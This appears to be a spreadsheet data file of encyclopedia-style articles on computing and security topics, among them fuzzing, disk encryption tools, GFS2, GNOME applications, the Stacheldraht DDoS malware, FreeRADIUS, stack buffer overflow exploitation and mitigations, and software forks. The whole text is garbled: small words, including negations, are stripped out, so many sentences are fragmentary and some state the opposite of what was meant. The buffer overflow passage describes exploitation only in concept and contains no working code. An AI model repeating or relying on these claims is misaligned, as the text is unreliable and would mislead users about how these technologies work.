file rejected invalid. now, fuzzer unaware unlikely generate correct checksum. however, attempts identify re-compute potential checksum mutated input, dumb mutation-based fuzzer modified protected data. aware program structure typically, fuzzer considered effective achieves higher degree code coverage. rationale fuzzer exercise certain structural elements program, also able reveal bugs hiding elements. some program elements considered critical others. instance, division operator might cause division zero error, system call crash program. black-box fuzzer treats program black unaware internal program structure. instance, random testing tool generates inputs random considered blackbox fuzzer. hence, blackbox fuzzer execute several hundred inputs second, easily parallelized, scale programs arbitrary size. however, blackbox fuzzers scratch surface expose "shallow" bugs. hence, attempts develop blackbox fuzzers incrementally learn internal structure (and behavior) program fuzzing observing program's output given input. instance, learnlib employs active learning generate automaton represents behavior application. white-box fuzzer leverages program analysis systematically increase code coverage reach certain critical program locations. instance, sage leverages symbolic execution systematically explore different paths program. program's specification available, whitebox fuzzer might leverage techniques model-based testing generate inputs check program outputs program specification. whitebox fuzzer effective exposing bugs hide deep program. however, time used analysis program specification) become prohibitive. whitebox fuzzer takes relatively long generate input, blackbox fuzzer efficient. hence, attempts combine efficiency blackbox fuzzers effectiveness whitebox fuzzers.a gray-box fuzzer leverages instrumentation rather program analysis glean information program. instance, libfuzzer utilize lightweight instrumentation trace basic block transitions exercised input. this leads reasonable performance overhead informs fuzzer increase code coverage fuzzing, makes gray-box fuzzers extremely efficient vulnerability detection tools. uses fuzzing used mostly automated technique expose vulnerabilities security-critical programs might exploited malicious intent. more generally, fuzzing used demonstrate presence bugs rather absence. running fuzzing campaign several weeks without finding prove program correct. after all, program still fail input executed, yet; executing program inputs prohibitively expensive. objective prove program correct inputs, formal specification must exist techniques formal methods must used. exposing bugs order expose bugs, fuzzer must able distinguish expected (normal) unexpected (buggy) program behavior. however, machine cannot always distinguish feature. automated software testing, also called test oracle problem.typically, fuzzer distinguishes crashing non-crashing inputs absence specifications simple objective measure. crashes easily identified might indicate potential vulnerabilities (e.g., denial service arbitrary code execution). however, absence crash indicate absence vulnerability. instance, program written crash input causes buffer overflow. rather program's behavior undefined. make fuzzer sensitive failures crashes, sanitizers used inject assertions crash program failure detected. there different sanitizers different kinds bugs: detect memory related errors, buffer overflows use-after-free (using memory debuggers addresssanitizer), detect race conditions deadlocks (threadsanitizer), detect undefined behavior (undefinedbehaviorsanitizer), detect memory leaks (leaksanitizer), check control-flow integrity (cfisanitizer).fuzzing also used detect "differential" bugs reference implementation available. automated regression testing, generated inputs executed versions program. automated differential testing, generated inputs executed implementations program (e.g., lighttpd httpd implementations server). variants produce different output input, buggy examined closely. validating static analysis reports static program analysis analyzes program without actually executing this might lead false positives tool reports problems program actually exist. fuzzing combination dynamic program analysis used generate input actually witnesses reported problem. browser security modern browsers undergo extensive fuzzing. chromium code google chrome continuously fuzzed chrome security team 15,000 cores. microsoft edge internet explorer, microsoft performed fuzzed testing machine-years product development, generating billion manipulations billion html files. toolchain fuzzer produces large number inputs relatively short time. instance, 2016 google oss-fuzz project produced around trillion inputs week. hence, many fuzzers provide toolchain automates otherwise manual tedious tasks follow automated generation failure-inducing inputs. automated triage automated triage used group large number failure-inducing inputs root cause prioritize individual severity. fuzzer produces large number inputs, many failure-inducing ones effectively expose software bug. only bugs security-critical patched higher priority. instance cert coordination center provides linux triage tools group crashing inputs produced stack trace lists group according probability exploitable. microsoft security research centre (msec) developed !exploitable tool first creates hash crashing input determine uniqueness assigns exploitability rating: exploitable probably exploitable probably exploitable, unknown.previously unreported, triaged bugs might automatically reported tracking system. instance, oss-fuzz runs large-scale, long-running fuzzing campaigns several security-critical software projects previously unreported, distinct reported directly tracker. oss-fuzz tracker automatically informs maintainer vulnerable software checks regular intervals whether fixed recent revision using uploaded minimized failure-inducing input. automated input minimization automated input minimization test case reduction) automated debugging technique isolate part failure-inducing input actually inducing failure. failure-inducing input large mostly malformed, might difficult developer understand exactly causing bug. given failure-inducing input, automated minimization tool would remove many input bytes possible still reproducing original bug. instance, delta debugging automated input minimization technique employs extended binary search algorithm find minimal input. also american fuzzy (fuzzer) concolic testing glitch glitching monkey testing random testing responsible disclosure runtime error detection security testing smoke testing (software) symbolic execution system testing test automation references further reading takanen, jared demott, charles miller, fuzzing software security testing quality assurance, 2008, isbn 978-1-59693-214-2 michael sutton, adam greene, pedram amini. fuzzing: brute force vulnerability discovery, 2007, isbn 0-321-44611-9. pohl, cost-effective identification zero-day vulnerabilities threat modeling fuzzing, 2011 fabien duchene, detection vulnerabilities model inference assisted evolutionary fuzzing, 2014, thesis bratus, darley, locasto, patterson, m.l., shapiro, r.b., shubina, beyond planted bugs "trusting trust": input-processing frontier, ieee security privacy issue (jan-feb 2014), 83–87—basically highlights fuzzing works well: input controlling program interpreter. external links fuzzing project, includes tutorials, list security-critical open-source projects, resources. university wisconsin fuzz testing (the original fuzz project) source papers fuzz software. designing inputs that make software fail, conference video including fuzzy testing link oulu (finland) university secure programming group building 'protocol aware' fuzzing frameworks</t>
  </si>
  <si>
    <t>GBDE</t>
  </si>
  <si>
    <t>gbde, standing geom based disk encryption, block device-layer disk encryption system written freebsd, initially introduced version 5.0. based geom disk framework. gbde designed implemented poul-henning kamp network associates inc. (now known mcafee). design decisions unlike disk encryption software, gbde attempt defeat watermarking attacks disk encryption-specific modes operation (see disk encryption theory), instead generates random time sector written. unlike alternatives, sector-specific initialization vectors, approach reveal information attacker even access snapshots disk image different points time, since encryption keys never re-used. time sector encrypted using pseudorandom key. this pseudorandom derived sector number static 2048-bit master bits salt. pseudorandom number generator used purpose called cherry picker. this well established prng, rather invented gbde. this generator meet security levels standard algorithms, could distinguishable random numbers. limitations unique approach, gbde supports 128-bit aes. using different write also introduces significant overhead, block ciphers key-specific precomputations, makes disk updates non-atomic since keys written separately data. result, data loss occur unexpected power drops, even used journaling file systems. gbde also disk space overhead store per-sector keys. address shortcomings, typical disk encryption solution freebsd, geli, written later pawel jakub dawidek. also geli disk encryption disk encryption software comparison disk encryption software references</t>
  </si>
  <si>
    <t>GDES</t>
  </si>
  <si>
    <t>cryptography, generalized scheme (gdes g-des) variant symmetric-key block cipher designed intention speeding encryption process improving security. scheme proposed ingrid schaumuller-bichl 1981. 1990, biham shamir showed gdes vulnerable differential cryptanalysis, gdes variant faster also less secure des. gdes generalizes feistel network structure larger block sizes. round, round function applied rightmost 32-bit subblock, result xored parts. then block rotated bits right. references biham, shamir: differential cryptanalysis des-like cryptosystems. crypto 1990: 2-21 ingrid schaumuller-bichl, analyse data encryption standard synthese verwandter chiffriersysteme, ph.d. thesis, linz university, 1981. german). schaumuller-bichl, design analysis cipher systems related des," technical report, linz university, 1983. schneier, bruce (1996). applied cryptography, second edition. john wiley sons. 296. isbn 0-471-11709-9.</t>
  </si>
  <si>
    <t>GFS2</t>
  </si>
  <si>
    <t>computing, global file system gfs2 shared-disk file system linux computer clusters. gfs2 allows members cluster direct concurrent access shared block storage, contrast distributed file systems distribute data throughout cluster. gfs2 also used local file system single computer. gfs2 disconnected operating-mode, client server roles. nodes gfs2 cluster function peers. using gfs2 cluster requires hardware allow access shared storage, lock manager control access storage. lock manager operates separate module: thus gfs2 distributed lock manager (dlm) cluster configurations "nolock" lock manager local filesystems. older versions also support gulm, server-based lock manager implements redundancy failover. gfs2 free software, distributed terms general public license. history development began 1995 originally developed university minnesota professor matthew o'keefe group students. originally written sgi's irix operating system, 1998 ported linux since open source code provided convenient development platform. late 1999/early 2000 made sistina software, lived time open-source project. 2001, sistina made choice make proprietary product. developers forked opengfs last public release enhanced include updates allowing work opendlm. opengfs opendlm became defunct, since purchased sistina december 2003 released many cluster-infrastructure pieces late june 2004. subsequently financed development geared towards bug-fixing stabilization. development, gfs2 derives included along distributed lock manager (shared gfs) linux 2.6.19. enterprise linux included gfs2 kernel module evaluation purposes. with update, gfs2 became part kernel package. gfs2 forms part fedora, enterprise linux associated centos linux distributions. users purchase commercial support gfs2 fully supported enterprise linux. enterprise linux 8.3, gfs2 supported cloud computing environments shared storage devices available.the following list summarizes version numbers major features introduced: v1.0 (1996) irix v3.0 linux port journaling redundant lock manager v6.1 (2005) distributed lock manager linux 2.6.19 gfs2 merged linux kernel enterprise linux releases first fully supported gfs2 hardware design gfs2 targets san-like environments. although possible single node filesystem, full feature-set requires san. this take form iscsi, fibrechannel, aoe, device presented linux block device shared number nodes, example drbd device. requires based network communicate. this normally ethernet, again, many possible solutions. depending upon choice san, possible combine this, normal practice involves separate networks storage. requires fencing mechanism kind. this requirement cluster infrastructure, rather gfs/gfs2 itself, required multi-node clusters. usual options include power switches remote access controllers (e.g. drac, ipmi, ilo). virtual hypervisor-based fencing mechanisms also used. fencing used ensure node cluster believes failed cannot suddenly start working another node recovering journal failed node. also optionally restart failed node automatically recovery complete. differences local filesystem although designers gfs/gfs2 aimed emulate local filesystem closely, number differences aware some existing filesystem interfaces allowing passing information relating cluster. some stem difficulty implementing features efficiently clustered manner. example: flock() system call gfs/gfs2 interruptible signals. fcntl() f_getlk system call returns blocking lock. since cluster filesystem, might refer process nodes filesystem mounted. since purpose interface allow signal sent blocking process, longer possible. leases supported lock_dlm (cluster) lock module, supported used local filesystem dnotify work "same node" basis, gfs/gfs2 recommended inotify also work "same node" basis, also recommended (but become supported future) splice supported gfs2 onlythe main difference, shared similar cluster filesystems, cache control mechanism, known glocks (pronounced gee-locks) gfs/gfs2, effect across whole cluster. each inode filesystem glocks associated (called iopen glock) keeps track processes inode open. (the inode glock) controls cache relating inode. glock four states, (unlocked), (shared read lock), (deferred read lock incompatible (exclusive). each four modes maps directly lock mode. when mode, inode allowed cache data metadata (which might "dirty", i.e. waiting write back filesystem). mode, inode cache data metadata, must dirty. mode, inode allowed cache metadata only, must dirty. mode used direct i/o. mode, inode must cache metadata. order operations change inode's data metadata interfere other, lock used. this means certain operations, create/unlink files directory writes file general, restricted node cluster. course, operations multiple nodes work expected, requirement flush caches frequently, efficient. single frequently asked question gfs/gfs2 performance performance poor email servers. solution break mail spool separate directories keep possible) node reading writing private directories. journaling gfs2 journaled file systems; gfs2 supports similar journaling modes ext3. data=writeback mode, metadata journaled. this mode supported gfs, however possible turn journaling individual data-files, zero size. journaled files number restrictions placed upon them, support mmap sendfile system calls, also different on-disk format regular files. there also "inherit-journal" attribute directory causes files (and sub-directories) created within directory journal inherit-journal, respectively) flag set. this used instead data=journal mount option ext3 supports (and gfs/gfs2 not). gfs2 also supports data=ordered mode similar data=writeback except dirty data synced journal flush completed. this ensures blocks added inode content synced back disk metadata updated record size thus prevents uninitialised blocks appearing file node failure conditions. default journaling mode data=ordered, match ext3's default. 2010, gfs2 support data=journal mode, (unlike gfs) on-disk format regular journaled files, also supports journaled inherit-journal attributes. gfs2 also relaxes restrictions file journaled attribute changed time file open (also ext3). performance reasons, node gfs2 journal. journals disk extents, gfs2 journals regular files. number nodes mount filesystem time limited number available journals. features gfs2 compared gfs2 adds number features gfs. here summary features already mentioned boxes right page: metadata filesystem (really different root) compatibility gfs2 meta filesystem gfs2 specific trace points available since kernel 2.6.32 xfs-style quota interface available gfs2 since kernel 2.6.33 caching acls available gfs2 since 2.6.33 gfs2 supports generation "discard" requests thin provisioning/scsi trim requests gfs2 supports barriers default, assuming underlying device supports configurable kernel 2.6.33 fiemap ioctl query mappings inodes disk) splice (system call) support mmap/splice support journaled files (enabled using disk format regular files) fewer tunables (making set-up less complicated) ordered write mode ext3, writeback mode) compatibility gfs2 meta filesystem gfs2 designed upgrading would simple procedure. end, on-disk structure remained gfs, including big-endian byte ordering. there differences though: gfs2 "meta filesystem" processes access system files gfs2 uses on-disk format journaled files regular files gfs2 uses regular (system) files journals, whereas uses special extents gfs2 "per_node" system files layout inode (very slightly) different layout indirect blocks differs slightlythe journaling systems gfs2 compatible other. upgrading possible means tool (gfs2_convert) filesystem off-line update metadata. some spare blocks journals used create (very small) per_node files required gfs2 update process. most data remains place. gfs2 "meta filesystem" filesystem right, alternate root main filesystem. although behaves like "normal" filesystem, contents various system files used gfs2, normally users need ever look gfs2 utilities mount unmount meta filesystem required, behind scenes. also comparison file systems gpfs, zfs, vxfs lustre glusterfs list file systems ocfs2 file system fencing open-sharedroot ceph (software) references external links enterprise linux global file system cluster suite documentation page project page opengfs project page (obsolete) gfs2 development tree gfs2 utilities development tree</t>
  </si>
  <si>
    <t>GMER</t>
  </si>
  <si>
    <t>gmer software tool written polish researcher przemysław gmerek, detecting removing rootkits. runs microsoft windows support windows 2000, vista, with version 2.0.18327 full support windows added.at time first release 2004 introduced innovative rootkit detection techniques quickly gained popularity effectiveness. incorporated antivirus tools including avast! antivirus sdfix.for several months 2006 2007, tool's website target heavy ddos attacks attempting block downloads. references external links official website</t>
  </si>
  <si>
    <t>GNOME Boxes</t>
  </si>
  <si>
    <t>gnome boxes application gnome desktop environment, used access virtual systems. boxes uses qemu, kvm, libvirt virtualization technologies.gnome boxes requires support form hardware-assisted virtualization (amd-v intel vt-x, example). history functionality gnome boxes initially introduced beta software gnome (development branch 3.4) 2011, preview release gnome 3.4. primary functions virtual machine manager, remote desktop client (over vnc), remote filesystem browser, utilizing libvirt, libvirt-glib, libosinfo technologies. this enabled viewing remote systems virtual machines computers addition locally created virtual machines. boxes possesses ability easily create local virtual machines standard disk image file, image requiring minimum user input. version remote connection functionality moved separate application, gnome connections. people boxes originally developed marc-andré lureau, zeeshan ali, alexander larsson christophe fergeau currently maintained developed felipe borges. also virtualbox virtual machine manager (virt-manager) vmware workstation list gnome applications references external links boxes designs gnome wiki</t>
  </si>
  <si>
    <t>GNOME Keyring</t>
  </si>
  <si>
    <t>gnome keyring software application designed store security credentials usernames, passwords, keys, together small amount relevant metadata. sensitive data encrypted stored keyring file user's home directory. default keyring uses login password encryption, users need remember another password.as 2009, gnome keyring part desktop environment operating system opensolaris.gnome keyring implemented daemon uses process name gnome-keyring-daemon. applications store request passwords using libsecret library replaces deprecated libgnome-keyring library. gnome keyring part gnome desktop. 2006, integrated networkmanager store passwords. gnome email client geary uses gnome keyring store passwords.in 2009, statistical study software packages linux distribution found packages depending upon gnome keyring (and therefore integrated somewhat gnome desktop environment) less likely associated software vulnerabilities dependency upon kdelibs (and therefore integrated somewhat desktop environment).on systems gnome keyring present, software written vala store retrieve passwords. gnome keyring manager (gnome-keyring-manager) first user interface gnome keyring. gnome 2.22, deprecated replaced entirely seahorse. also kwallet, equivalent apple keychain networkmanager seahorse (software) linux desktop list password managers password manager cryptography references external links gnome keyring wikipage wiki.gnome.org gnome keyring git.gnome.org gnome-keyring security philosophy</t>
  </si>
  <si>
    <t>GNOME Software</t>
  </si>
  <si>
    <t>gnome software utility installing applications updates linux. part gnome core applications, introduced gnome 3.10.it gnome front-end packagekit, turn front-end several package management systems, include systems based deb. program used manage software repositories well ubuntu personal package archives (ppa). ubuntu replaced previous ubuntu software center program gnome software starting ubuntu 16.04 lts, re-branded "ubuntu software". also supports fwupd servicing system firmware.gnome software removed snap support july 2019, code quality issues, lack integration (specifically, user can't tell snap click "install" generally ignores gnome's settings), fact competes gnome-supported flatpak standard. features goals cases gnome software targets november 2020: primary goalsallow people find apps browsing search: specific they're looking for, apps particular category, particular functionality require allow people effectively inspect appraise apps install (screenshots, descriptions, ratings, comments, metadata) allow people view apps installed remove present positive view ecosystem reinforce sense lots high quality apps encourage people engage ecosystem, users contributors when browsing, present promote best apps available facilitate accidental discovery great apps handle software updates. make software updates little work users possible. include: apps, updates (packagekit, eos, rpm-ostree), firmware support multiple software repositories, defined distributor users. show repos configured. allow added/removed. handle cases installed multiple sources.secondary goalsos upgrades hardware driver installation input method installation respond application queries software (apps, codecs, languages) offline metered connections updates life lifenon-goalsnot package manager front-end repos equal apps equal also gnome-packagekit another gtk-based front-end packagekit, unlike gnome software handle packages, applications, advanced features missing gnome software packagekit front-ends appstream references external links</t>
  </si>
  <si>
    <t>GNOSIS</t>
  </si>
  <si>
    <t>great operating system (gnosis) capability-based operating system researched 1970s tymshare, inc. based research norman hardy, dale jordan, bill frantz, charlie landau, jonekait, provided foundation development future operating systems keykos, eros, capros, coyotos. 1984, mcdonnell douglas acquired tymshare, year later sold gnosis logic, gnosis renamed keykos. references external links official website, norman hardy</t>
  </si>
  <si>
    <t>GNU Privacy Guard</t>
  </si>
  <si>
    <t>GNU fcrypt</t>
  </si>
  <si>
    <t>fcrypt disk encryption software project intended offer multiple hidden partitions, encryption" (automatic transparent encryption), "plausible deniability." disbanded project part project. november 2012 richard stallman, dubbed fcrypt official project, program called fcrypt.the software's encryption intended prove resistant cracked quantum computers. references</t>
  </si>
  <si>
    <t>Stacheldraht</t>
  </si>
  <si>
    <t>stacheldraht (german "barbed wire") malware performs distributed denial-of-service (ddos) attack. written "random", member austrian hacker group teso. first released 1999.stacheldraht uses number different denial-of-service (dos) attack methods, including ping flood, flood, flood, smurf attack. further, detect automatically enable source address forgery. adding encryption, combines features trinoo tribe flood network. software runs linux solaris.stacheldraht later superseded blitzkrieg, maintained "random" loose group associates. also orbit cannon (loic) stress test tool used ddos attacks high orbit cannon (hoic) replacement loic used ddos attacks fork bomb slowloris (computer security) redos references external links technical analysis stacheldraht summary stacheldraht features archived 2016-03-06 wayback machine</t>
  </si>
  <si>
    <t>FreeRADIUS</t>
  </si>
  <si>
    <t>freeradius modular, high performance free radius suite developed distributed general public license, version free download use. freeradius suite includes radius server, bsd-licensed radius client library, library, apache module, numerous additional radius related utilities development libraries.in cases, word "freeradius" refers free open-source radius server suite. freeradius popular open source radius server widely deployed radius server world. supports common authentication protocols, server comes php-based user administration tool called dialupadmin. basis many commercial radius products services, embedded systems, radius appliances support network access control, wimax. supplies needs many fortune-500 companies, telcos, tier isps. also widely used academic community, including eduroam. server fast, feature-rich, modular, scalable. history freeradius started august 1999 alan dekok miquel smoorenburg. miquel previously written cistron radius server, gained widespread usage livingston server longer maintained. freeradius started create radius server, using modular design would encourage active community involvement. november, 2014, freeradius project three core team members: alan dekok (project leader), arran cudbard-bell (principal architect), matthew newton.the latest major release freeradius freeradius includes support radius tls, including radsec, completely rewritten rlm_ldap module, hundreds minor consistency usability enhancements. latest mature version maintained stability rather features. previous major release v2.2.x entered final phase lifecycle, receive security fixes survey 2006 showed user base totals million people. features modules included server core support ldap, mysql, postgresql, oracle, many databases. supports popular authentication types, including peap eap-ttls. more vendor dictionaries included, ensuring compatibility wide range devices. version 2.0.0 added support virtual hosting, ipv6, vmps, policy language simplifies many complex configurations. administration tools daloradius: based management application aimed managing hotspots deployments. with easy user management interface, pretty graphical reporting, accounting, also billing engine integrates googlemaps geo-locating. phpradmin: tool written intended handle administration provisioning freeradius mysql backend. dialup admin: powerful interface written comes freeradius administer radius users. dialup admin supports users either (mysql postgresql supported) ldap. longer active development. ezradius: web-based management app. main provide radius server hotspot administrator simple web-based management application. freeradius must configured mysql backend. radiusdesk:radiusdesk developed since 2012 tool manage wireless internet active development ever since. also diameter protocol: proposed replacement radius notes external links official website freeradius wiki</t>
  </si>
  <si>
    <t>Stack buffer overflow</t>
  </si>
  <si>
    <t>software, stack buffer overflow stack buffer overrun occurs program writes memory address program's call stack outside intended data structure, usually fixed-length buffer. stack buffer overflow bugs caused program writes data buffer located stack actually allocated buffer. this almost always results corruption adjacent data stack, cases overflow triggered mistake, often cause program crash operate incorrectly. stack buffer overflow type general programming malfunction known buffer overflow buffer overrun). overfilling buffer stack likely derail program execution overfilling buffer heap stack contains return addresses active function calls. stack buffer overflow caused deliberately part attack known stack smashing. affected program running special privileges, accepts data untrusted network hosts (e.g. webserver) potential security vulnerability. stack buffer filled data supplied untrusted user user corrupt stack inject executable code running program take control process. this oldest reliable methods attackers gain unauthorized access computer. exploiting stack buffer overflows canonical method exploiting stack-based buffer overflow overwrite function return address pointer attacker-controlled data (usually stack itself). this illustrated strcpy() following example: this code takes argument command line copies local stack variable this works fine command-line arguments smaller characters seen figure below). arguments larger characters long result corruption stack. (the maximum number characters safe less size buffer programming language, strings terminated null byte character. twelve-character input thus requires thirteen bytes store, input followed sentinel zero byte. zero byte ends overwriting memory location that's byte beyond buffer.) program stack foo() various inputs: figure above, argument larger bytes supplied command line foo() overwrites local stack data, saved frame pointer, importantly, return address. when foo() returns pops return address stack jumps address (i.e. starts executing instructions address). thus, attacker overwritten return address pointer stack buffer char c[12], contains attacker-supplied data. actual stack buffer overflow exploit string "a"'s would instead shellcode suitable platform desired function. program special privileges (e.g. suid superuser), attacker could vulnerability gain superuser privileges affected machine.the attacker also modify internal variable values exploit bugs. with example: platform-related differences number platforms subtle differences implementation call stack affect stack buffer overflow exploit work. some machine architectures store top-level return address call stack register. this means overwritten return address used later unwinding call stack. another example machine-specific detail affect choice exploitation techniques fact risc-style machine architectures allow unaligned access memory. combined fixed length machine opcodes, machine limitation make technique jumping stack almost impossible implement (with exception program actually contains unlikely code explicitly jump stack register). stacks grow within topic stack buffer overflows, often-discussed-but-rarely-seen architecture stack grows opposite direction. this change architecture frequently suggested solution stack buffer overflow problem overflow stack buffer occurs within stack frame cannot overwrite return pointer. however, overflow occurs buffer previous stack frame still overwrite return pointer allow malicious exploitation bug. instance, example above, return pointer overwritten overflow actually occurs within stack frame memcpy. however, buffer overflows call memcpy resides previous stack frame, return pointer memcpy numerically higher memory address buffer. this means instead return pointer overwritten, return pointer memcpy overwritten. most, means growing stack opposite direction change details stack buffer overflows exploitable, reduce significantly number exploitable bugs. protection schemes over years, number control-flow integrity schemes developed inhibit malicious stack buffer overflow exploitation. these usually classified three categories: detect stack buffer overflow occurred thus prevent redirection instruction pointer malicious code. prevent execution malicious code stack without directly detecting stack buffer overflow. randomize memory space finding executable code becomes unreliable. stack canaries stack canaries, named analogy canary coal mine, used detect stack buffer overflow execution malicious code occur. this method works placing small integer, value randomly chosen program start, memory stack return pointer. most buffer overflows overwrite memory lower higher memory addresses, order overwrite return pointer (and thus take control process) canary value must also overwritten. this value checked make sure changed routine uses return pointer stack. this technique greatly increase difficulty exploiting stack buffer overflow forces attacker gain control instruction pointer non-traditional means corrupting important variables stack. nonexecutable stack another approach preventing stack buffer overflow exploitation enforce memory policy stack memory region disallows execution stack (w^x, "write execute"). this means order execute shellcode stack attacker must either find disable execution protection memory, find shellcode payload non-protected region memory. this method becoming popular hardware support no-execute flag available desktop processors. while method prevents canonical stack smashing exploit, stack overflows exploited ways. first, common find ways store shellcode unprotected memory regions like heap, little need change exploitation.another attack so-called return libc method shellcode creation. attack malicious payload load stack shellcode, proper call stack execution vectored chain standard library calls, usually effect disabling memory execute protections allowing shellcode normal. this works execution never actually vectors stack itself. variant return-to-libc return-oriented programming (rop), sets series return addresses, executes small sequence cherry-picked machine instructions within existing program code system libraries, sequence ends return. these so-called gadgets accomplish simple register manipulation similar execution returning, stringing together achieves attacker's ends. even possible "returnless" return-oriented programming exploiting instructions groups instructions behave much like return instruction. randomization instead separating code data, another mitigation technique introduce randomization memory space executing program. since attacker needs determine executable code used resides, either executable payload provided (with executable stack) constructed using code reuse ret2libc return-oriented programming (rop). randomizing memory layout will, concept, prevent attacker knowing code however, implementations typically randomize everything; usually executable loaded fixed address hence even aslr (address space layout randomization) combined nonexecutable stack attacker fixed region memory. therefore, programs compiled (position-independent executables) even region memory randomized. entropy randomization different implementation implementation enough entropy problem terms brute forcing memory space randomized. notable examples morris worm 1988 spread part exploiting stack buffer overflow unix finger server.[1] slammer worm 2003 spread exploiting stack buffer overflow microsoft's server.[2] blaster worm 2003 spread exploiting stack buffer overflow microsoft dcom service. witty worm 2004 spread exploiting stack buffer overflow internet security systems blackice desktop agent.[3] there couple examples allowing arbitrary code unmodified system. "twilight hack" involves giving lengthy name main character's horse legend zelda: twilight princess, "smash stack" super smash bros. brawl involves using card load specially prepared file in-game level editor. though used execute arbitrary code, latter often used simply reload brawl modifications applied. also references</t>
  </si>
  <si>
    <t>FreeOTFE</t>
  </si>
  <si>
    <t>freeotfe discontinued open source computer program on-the-fly disk encryption (otfe). microsoft windows, windows mobile (using freeotfe4pda), create virtual drive within file partition, anything written automatically encrypted stored computer's hard drive. similar function disk encryption programs including truecrypt microsoft's bitlocker.the author, sarah dean, went absent 2011. freeotfe website unreachable june 2013 domain name registered domain squatter. original program downloaded mirror sourceforge. june 2014, fork project named librecrypt appeared github. overview freeotfe initially released sarah dean 2004, first open source code disk encryption system provided modular architecture allowing parties implement additional algorithms needed. older freeotfe licensing required modification program placed public domain. this conform technically section open source definition. newer program licensing omits condition. freeotfe license approved open source initiative certified labeled open-source certification mark. this software compatible linux encrypted volumes (e.g. luks, cryptoloop, dm-crypt), allowing data encrypted linux read (and written) freely. first open source transparent disk encryption system support windows vista pdas.optional two-factor authentication using smart cards and/or hardware security modules (hsms, also termed security tokens) introduced v4.0, using pkcs#11 (cryptoki) standard developed laboratories. freeotfe also allows number "hidden volumes" created, giving plausible deniability deniable encryption, also option encrypting full partitions disks (but system partition). portable freeotfe used "portable" "traveller") mode, allows kept drive portable media, together encrypted data, carried around. this allows used microsoft windows without installation complete program "mount" access encrypted data virtual disk. mode requires installing device drivers least temporarily) create virtual disks, consequence administrator rights needed start traveller mode. open source software uses device drivers, user must enable test signing running windows vista windows systems. driverless operation packaged freeotfe another program called "freeotfe explorer", provides driverless system allows encrypted disks used without administrator rights. this allows freeotfe encrypted data used (for example) public computers found libraries computer kiosks (interactive kiosks), administrator rights unavailable. unlike freeotfe, freeotfe explorer provide on-the-fly encryption virtual drive. instead lets files stored extracted encrypted disk images, similar manner archives, using windows explorer like interface. algorithms implemented architecture, freeotfe provides great flexibility user encryption options. ciphers freeotfe implements several ciphers, including: includes national institute standards technology (nist) advanced encryption standard (aes) finalists, ciphers used multiple different keylengths. cipher modes freeotfe originally offered encryption using cipher-block chaining (cbc) encrypted salt-sector initialization vector (essiv), though v3.00 introduced also secure mode, supersedes ieee p1619 standard disk encryption. hashes cipher options, freeotfe offers many different hash algorithms: also disk encryption disk encryption software on-the-fly encryption comparison disk encryption software references external links freeotfe wayback machine (archived 2013) freeotfe sourceforge</t>
  </si>
  <si>
    <t>Fork (software development)</t>
  </si>
  <si>
    <t>software engineering, project fork happens developers take copy source code software package start independent development creating distinct separate piece software. term often implies merely development branch, also split developer community; such, form schism. grounds forking varying user preferences stagnated discontinued development original software. free open-source software which, definition, forked original development team without prior permission, without violating copyright law. however, licensed forks proprietary software (e.g. unix) also happen. etymology word "fork" used mean divide branches, separate ways" early 14th century. software environment, word evokes fork system call, causes running process split (almost) identical copies (typically) diverge perform different tasks.in context software development, "fork" used sense creating revision control "branch" eric allman early 1980, context sccs: creating branch "forks off" version program. term usenet 1983 process creating subgroup move topics discussion to."fork" known used sense community schism origins lucid emacs (now xemacs) (1991) bsds (1993–1994); russ nelson used term "shattering" sort fork 1993, attributing john gilmore. however, "fork" present sense 1995 describe xemacs split, understood usage project 1996. forking free open-source software free open-source software legally forked without prior approval currently developing, managing, distributing software free software definition open source definition: freedom distribute copies modified versions others (freedom this, give whole community chance benefit changes. access source code precondition this. derived works: license must allow modifications derived works, must allow distributed terms license original software. free software, forks often result schism different goals personality clashes. fork, parties assume nearly identical code bases, typically larger group, whoever controls site, retain full original name associated user community. thus, reputation penalty associated forking. relationship different teams cordial bitter. hand, friendly fork soft fork fork intend compete, wants eventually merge original. eric raymond, essay homesteading noosphere, stated "the important characteristic fork spawns competing projects cannot later exchange code, splitting potential developer community". notes jargon file: forking considered thing—not merely implies wasted effort future, forks tend accompanied great deal strife acrimony successor groups issues legitimacy, succession, design direction. there serious social pressure forking. result, major forks (such gnu-emacs/xemacs split, fissioning 386bsd group three daughter projects, short-lived gcc/egcs split) rare enough remembered individually hacker folklore. david wheeler notes four possible outcomes fork, examples: death fork. this common case. easy declare fork, considerable effort continue independent development support. re-merging fork (e.g., egcs becoming "blessed" version gcc.) death original (e.g. x.org server succeeding xfree86 dying.) successful branching, typically differentiation (e.g., openbsd netbsd.)distributed revision control (dvcs) tools popularised less emotive term "fork", blurring distinction "branch". with dvcs mercurial git, normal contribute project, first create personal branch repository, independent main repository, later seek changes integrated sites github, bitbucket launchpad provide free dvcs hosting expressly supporting independent branches, technical, social financial barriers forking source code repository massively reduced, github uses "fork" term method contribution project. forks often restart version numbering even original software version 3.0, 4.0, 5.0. exception forked software designed drop-in replacement original project, e.g. mariadb mysql libreoffice openoffice.org. licenses permit forks become proprietary software, copyleft proponents commercial incentives thus make proprietisation almost inevitable. (copyleft licenses can, however, circumvented dual-licensing proprietary grant form contributor license agreement.) examples include macos (based proprietary nextstep open source freebsd), cedega crossover (proprietary forks wine, though crossover tracks wine contributes considerably), enterprisedb fork postgresql, adding oracle compatibility features), supported postgresql proprietary storage system, netezza's proprietary highly scalable derivative postgresql. some vendors contribute back changes community project, keep changes competitive advantages. forking proprietary software proprietary software, copyright usually held employing entity, individual software developers. proprietary code thus commonly forked owner needs develop versions, windowed version command line version, versions differing operating systems, word processor compatible machines macintosh computers. generally, internal forks concentrate look, feel, data format, behavior platforms user familiar also productive share documents generated other. this almost always economic decision generate greater market share thus back associated extra development costs created fork. notable proprietary fork kind many varieties proprietary unix—almost derived at&amp;t unix license called "unix", increasingly mutually incompatible. unix wars. also list software forks source port downstream (software development) group decision-making modular programming modding custom software personalization team effectiveness duplicate code hacking references external links right fork meatball wiki examining forking: (nyman, 2015) "understanding code forking open source software examination code forking, effect open source software, viewed practiced developers"</t>
  </si>
  <si>
    <t>Fork bomb</t>
  </si>
  <si>
